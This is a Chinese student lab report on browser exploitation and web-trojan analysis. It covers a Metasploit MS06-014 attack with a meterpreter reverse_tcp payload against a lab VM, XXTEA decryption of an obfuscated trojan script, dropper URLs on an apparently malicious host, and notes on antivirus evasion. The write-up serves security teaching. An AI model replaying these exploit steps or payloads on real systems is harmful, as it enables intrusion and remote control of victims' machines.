20211915 2022-2023-2 《网络攻防实践》实践十一报告

20211915 2022-2023-2 《网络攻防实践》实践十一报告

1.实验内容

1.1 木马

木马病毒是指通过特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是控制端，另一个是被控制端。木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名，木马病毒一般通过电子邮件附件发出，捆绑在其他的程序中。“木马”程序与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。 木马病毒的发作要在用户的机器里运行客户端程序，一旦发作，就可设置后门，定时地发送该用户的隐私到木马程序指定的地址，一般同时内置可进入该用户电脑的端口，并可任意控制此计算机，进行文件删除、拷贝、改密码等非法操作。

1.2 Web浏览器的基本结构

​现代Web浏览器指的是符合“现代标准”，并被互联网用户所接受使用的Web浏览器软件，目前的现代Web浏览器要求能够理解并支持HTML和XHTML、CSS、ECMAScript及W3C DOM等一系列标准，其基本结构与各种功能特性的复杂性也已经大大增加。需要支持各种应用层协议的Stream流接收与解析，并维护DOM对象模型结构，通过支持EMCAScript标准构建JavaScript、Flash ActionScript等客户端脚本语言的执行环境，以及支持CSS标准控制页面布局，最终在浏览器终端中将服务器端的各种流媒体对象、应用程序、客户端脚本执行效果进行渲染，展现给终端用户。
​现代Web浏览器软件除了在内核引擎中实现符合各种标准的基本功能和特性之外,普遍地采用各种扩展机制允许第三方开发一些插件,以提升浏览器软件功能的丰富性。下表显示了目前全球五个最主要的现代Web浏览器软件所采用的内核引繁与可扩展性机制情况,微软IE浏览器基于 Trident内核引擎(也被称为 MSHTML),在第一次浏览器战争过程中的1996年即采用了 Activex技术来支持第三方开发扩展插件,并沿用至今。Mozilla Firefox的内核引繁为 Gecko,通过XUL平台支持扩展插件开发。 Google Chrome和苹果的Safari都基于开源的 Webkit内核引擎, Opera基于的内核引擎为 Presto,这三款浏览器软件均于2010年才开始支持第三方扩展插件,Google Chrome可通过Xmlhttprequest和JSON机制来实现第三方扩展,而 Safari与 Opera则采用了标准化的 HTML5、CSS3与 Javascript支持第三方实现扩展插件。

2.实验过程

1.web浏览器渗透攻击

任务：使用攻击机和Windows靶机进行浏览器渗透攻击实验，体验网页木马构造及实施浏览器攻击的实际过程。
①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数，运行exploit，构造出恶意网页木马脚本

④在靶机环境中启动浏览器，验证与服务器的连通性，并访问而已网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态，并通过成功渗透攻击后建立起的远程控制会话SESSION，在靶机上远程执行命令
首先在kali中输入msfconsole,打开Metasploit.输入命令search MS06-014，搜索MS06-014渗透攻击模块

输入指令use exploit/windows/browser/ie_createobject，使用这个攻击机模块

使用命令 set LHOST 192.168.31.231 设置攻击机地址；使用命令 set payload windows/meterpreter/reverse_tcp 设定使用的载荷；使用命令 exploit 进行攻击.

攻击后会得到有木马的网址为如图所示
靶机访问地址

在kali中输入sessions查看连接，并验证会话是否有效。输入指令"sessions -i 1"打开会话1。发现攻击机可以对靶机进行操作。

2.实验二 网页木马攻击场景分析

实践过程：
①首先你应该访问start.html，在这个文件中给出了new09.htm的地址，
②在进入 htm 后，每解密出一个文件地址，请对其作 32 位 MD5 散列，以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写，且没有扩展名)，即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件，请继续解密。
④如果解密出的地址是二进制程序文件，请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
首先打开start.html文件，对其中的代码进行分析，找到new09.html

可以看到在new09.html文件中，用iframe引用了一个http://aa.18dd.net/aa/kl.htm 文件，用js引用了一个http://js.users.51.la/1299644.js 文件


对它们作 MD5 散列计算


下载上面的两个文件
在hashed文件中找到对应的文件，用记事本打开。 23180a42a2ff1192150231b44ffdf3d3 中的内容如下，提示不是我们要找的内容。

打开另一个文件 7f60672dcd6b5e90b6772545ee219bd3 ，看起来很复杂，但实际上这是一种被称为 XXTEA+Base64 的加密方法，对付这种加密方法，我们只要找到它的加密密钥就可以。注意上面的倒数第三行，即：

xxtea_decrypt 函数的第二个参数 \x73\x63\x72\x69\x70\x74 就是密钥。

这里简单地使用了 16 进制加密。转换一下，密钥是“script”。

访问https://cycy.sourceforge.io/xxtea/输入秘钥密钥 script ，在下面大的文本框中粘贴那个文件的全部内容，点“解密”，得到了十六进制加密。在对对引号中的内容进行解密，得到如下结果，将结果保存：

由上可以看到利用到的应用程序漏洞有： Adodb.StreamMPS.StormPlayer； POWERPLAYER.PowerPlayerCtrl.1； BaiduBar.Tool；这些都是现在网络用户使用非常频繁的软件，其危害性可见一斑。
除此之外还可以看到这个文件还引用了三个js文件和一个压缩包(bd.cab，解开后是bd.exe)，对他们作MD5散列：
在hashed文件夹中找到这四个文件：
首先看 1.js ，即 5d7e9058a857aa2abee820d5473c5fa4 ：

解密：

这个文件前面部分下载了一个 http://down.18dd.net/bb/014.exe 的可执行文件，后面部分是对 ADODB 漏洞 的继续利用。
看 b.js ，即 3870c28cc279d457746b3796a262f166 ：

解密后的代码如下所示：

出现shellcode代码：

出现一串字符：

这次变成了八进制转换，解密，结果如下：

同样有shellcode，用相同的方法得到 http://down.18dd.net/bb/pps.exe
最后一个压缩文件将其解压缩，可以得到 bd.exe 执行文件，计算将前三个可执行文件的 URL 的 MD5 值：

目前得到了四个exe文件，即014.exe，bf.exe，pps.exe，bd.exe。可以发现这四个文件在资源管理器中大小相同。

校验这四个文件的 MD5 值，会发现都是相同的 :

所以这四个文件内容完全相同，任务量减少到四分之一，只要分析其中一个就可以了。
使用脱壳软件查看可执行文件的加壳情况，发现是用 Delphi 写的：

用 IDA 反汇编这个 exe 文件：

由"advapi32.dll"，“drivers/klif.sys”，“\program files\internet explorer\IEXPLORE.EXE”，“IE执行保护”，“IEXPLORE.EXE”，“Software\Microsoft\Windows\CurrentVersion\Poli”，“Kernel32.dll”，“SOFTWARE\Borland\Delphi\RTL”，“ChangeServiceConfig2A”，“ChangeServiceConfig2W”，“QueryServiceConfig2A”，"QueryServiceConfig2W"等可以猜测程序可能会 修改IE、注册表、服务和系统文件；

实验三 web浏览器渗透攻击攻防对抗

启动metaspolit

按照实验一相同的步骤生成网址

靶机访问：

打开其源代码，可以看到中间使用了大量的空格、水平制表符和回车等，这样能够对关键指令做字符串拼接处理，防止被杀毒软件发现，将其中的源代码全选后输入到
http://www.esjson.com/htmlformat.html%E7%BD%91%E7%AB%99%E4%B8%8A%E5%AF%B9%E5%85%B6%E8%BF%9B%E8%A1%8C%E6%99%AE%E9%80%9A%E5%8E%8B%E7%BC%A9%EF%BC%8C%E5%BE%97%E5%88%B0%E4%B8%8B%E9%9D%A2%E6%A1%86%E9%87%8C%E7%9A%84%E4%B8%80%E6%AE%B5%E4%BB%A3%E7%A0%81


阅读代码，可以看到其中使用到document.location加载了payload，并且下一行中后面跟了一个可执行文件QRVZvwTvXomsbn.exe，猜想这个可执行文件应该是以攻击机为服务器，通过网页下载到靶机上的
打开靶机任务管理器查看正在运行的进程，能够发现出现的那个可执行文件。

通过查询可知攻击者使用的漏洞类型

3.学习中遇到的问题及解决

当出现无法打开vmx文件时，重启电脑即可。

4.实验总结

本次实验学习了web应用漏洞和木马的组成，对网络攻防能力有了较大提升。